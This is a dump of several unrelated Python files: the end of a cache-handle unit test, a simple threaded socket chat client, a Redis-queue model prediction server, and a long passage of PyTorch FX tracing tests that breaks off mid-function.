self.assertEqual('sequence2', s2.get_name())
# Release all references and force garbage-collection
del f1
del f2
del s1
del s2
dummy_handle.acquire(dummy_acquire_fn) # Get rid of the keepalive
gc.collect()
# Check that acquiring again after they're released gives new objects
f3 = first_handle.acquire(sequence.make_acquire_fn())
s3 = second_handle.acquire(sequence.make_acquire_fn())
self.assertEqual('sequence3', f3.get_name())
self.assertEqual('sequence4', s3.get_name())
def testTagCacheEviction(self):
shared1 = shared.Shared()
shared2 = shared.Shared()
def acquire_fn_1():
return NamedObject('obj_1')
def acquire_fn_2():
return NamedObject('obj_2')
# with no tag, shared handle does not know when to evict objects
p1 = shared1.acquire(acquire_fn_1)
assert p1.get_name() == 'obj_1'
p2 = shared1.acquire(acquire_fn_2)
assert p2.get_name() == 'obj_1'
# cache eviction can be forced by specifying different tags
p1 = shared2.acquire(acquire_fn_1, tag='1')
assert p1.get_name() == 'obj_1'
p2 = shared2.acquire(acquire_fn_2, tag='2')
assert p2.get_name() == 'obj_2'
def testTagReturnsCached(self):
sequence = Sequence()
handle = shared.Shared()
f1 = handle.acquire(sequence.make_acquire_fn(), tag='1')
self.assertEqual('sequence1', f1.get_name())
# should return cached
f1 = handle.acquire(sequence.make_acquire_fn(), tag='1')
self.assertEqual('sequence1', f1.get_name())
if __name__ == '__main__':
unittest.main()
|
Client.py
|
import socket
import threading
class Client:
def __init__(self):
self.create_connection()
def create_connection(self):
self.s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
while 1:
try:
host = input('Enter host name --> ')
port = int(input('Enter port --> '))
self.s.connect((host,port))
break
except:
print("Couldn't connect to server")
self.username = input('Enter username --> ')
self.s.send(self.username.encode())
message_handler = threading.Thread(target=self.handle_messages,args=())
message_handler.start()
input_handler = threading.Thread(target=self.input_handler,args=())
input_handler.start()
def handle_messages(self):
while 1:
print(self.s.recv(1024).decode())
def input_handler(self):
while 1:
self.s.send((self.username+' - '+input()).encode())
client = Client()
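# Wire protocol implied by the code above (an informal summary, not a documented spec):
# the client first sends its username as a bare UTF-8 string, and every later send is the
# pre-formatted line '<username> - <message>'; whatever the server broadcasts is printed verbatim.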
|
model_server.py
|
"""Scooter ML model server."""
import json
import time
from threading import Thread
import signal
from select import select
import sys
import numpy as np
import redis
# initialize constants used for server queuing
PREDICTION_QUEUE = "prediction:queue"
BATCH_SIZE = 32
SERVER_SLEEP = 0.25
CLIENT_SLEEP = 0.25
TIMEOUT = 5
ctrl_c_pressed = 0
db = redis.StrictRedis(host="localhost", port=6379, db=0)
def predictions_process(model_loader, sample_decoder, prediction_decoder):
"""Continuously query queue for new prediction jobs and execute them."""
model = model_loader()
# continually poll for new data to classify
while True:
batch_elements = db.lrange(PREDICTION_QUEUE, 0, BATCH_SIZE - 1)
batch, x_ids = _build_batch(batch_elements, sample_decoder)
if not x_ids:
time.sleep(SERVER_SLEEP)
continue
# classify the batch
print("Predicting on batch of size: %s" % (batch.shape,))
preds = model.predict(batch)
results = prediction_decoder(preds)
# loop over the x IDs and their corresponding set of results from our model
for (x_id, result_set) in zip(x_ids, results):
# initialize the list of output predictions
output = []
# loop over the results and add them to the list of output predictions
for (_, label, prob) in result_set:
result = {"label": label, "probability": float(prob)}
output.append(result)
# store the predictions in the database, using the ID as the key so we can fetch the results
db.set(x_id, json.dumps(output))
# remove the set of images from our queue
db.ltrim(PREDICTION_QUEUE, len(x_ids), -1)
time.sleep(SERVER_SLEEP)
def _build_batch(batch_elements, sample_decoder):
# attempt to grab a batch of images from the database, then initialize the image IDs and batch of images themselves
x_ids = []
batch = None
# loop over the queue
for element in batch_elements:
# deserialize the object and obtain the input image
element = json.loads(element.decode("utf-8"))
image = sample_decoder(element["x"])
if batch is None:
batch = image
# otherwise, stack the data
else:
batch = np.vstack([batch, image])
# update the list of image IDs
x_ids.append(element["id"])
return batch, x_ids
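# Sketch of the producer side of this queue protocol (an assumption pieced together from
# predictions_process/_build_batch above; the helper name and the exact encoding of 'x'
# are illustrative, not part of this module):
def _example_submit_and_wait(x_id, encoded_sample):
    """Push one prediction job onto the Redis list and poll for its JSON result."""
    db.rpush(PREDICTION_QUEUE, json.dumps({"id": x_id, "x": encoded_sample}))
    while True:
        output = db.get(x_id)
        if output is not None:
            db.delete(x_id)
            return json.loads(output)
        time.sleep(CLIENT_SLEEP)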
def _signal_handler(sig, frame):
global ctrl_c_pressed
if ctrl_c_pressed:
print("")
print("Shutting down.")
sys.exit(0)
ctrl_c_pressed = True
print("\rShut down this prediction service (y/[n])? ", end="")
rlist, _, _ = select([sys.stdin], [], [], TIMEOUT)
if rlist:
s = sys.stdin.readline()
if s.strip() == "y":
print("Shutting down.")
sys.exit(0)
print("Resuming.")
else:
print("No answer. Resuming.")
ctrl_c_pressed = False
def start_model_server(load_model, decode_sample, decode_predictions):
print("Starting prediction service")
signal.signal(signal.SIGINT, _signal_handler)
thread = Thread(target=predictions_process, args=(load_model, decode_sample, decode_predictions))
thread.daemon = True
thread.start()
while True:
time.sleep(1)
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Set, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
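# Rough intuition for the wrap() calls above (a summary, not an excerpt from the FX docs):
# wrapping a free function tells symbolic_trace to record calls to it as opaque
# call_function nodes instead of tracing through its body, which is why the tests below
# can assert that names like 'a_lifted_leaf' survive into the generated code.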
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in fx_module.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
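# The pickle round-trips here and in the next test rely on GraphModule's own
# pickling support, so the graph-generated forward survives serialization.
# Minimal usage sketch (illustrative only; `my_module` is a placeholder name,
# same imports as this file):
#
#   gm = torch.fx.symbolic_trace(my_module)
#   restored = pickle.loads(pickle.dumps(gm))
#   restored.graph.lint()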
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
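# Node.all_input_nodes flattens a node's args and kwargs down to the upstream
# Nodes they reference, which is exactly what the assertions above verify.
# Typical (illustrative) use when walking a graph:
#
#   for node in graph.nodes:
#       for upstream in node.all_input_nodes:
#           ...  # e.g. dependency bookkeeping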
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
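# The transform above is the usual "copy-and-extend" FX recipe: graph_copy()
# clones the old Graph into a fresh one and returns the value that fed the old
# output, new nodes are appended after it, and the result is wrapped in a new
# GraphModule rooted at the traced module. Illustrative sketch with the same
# imports as this file:
#
#   def append_neg(gm):
#       new_graph = torch.fx.Graph()
#       out_val = new_graph.graph_copy(gm.graph, {})
#       new_graph.output(new_graph.call_method('neg', (out_val,)))
#       return GraphModule(gm, new_graph)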
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
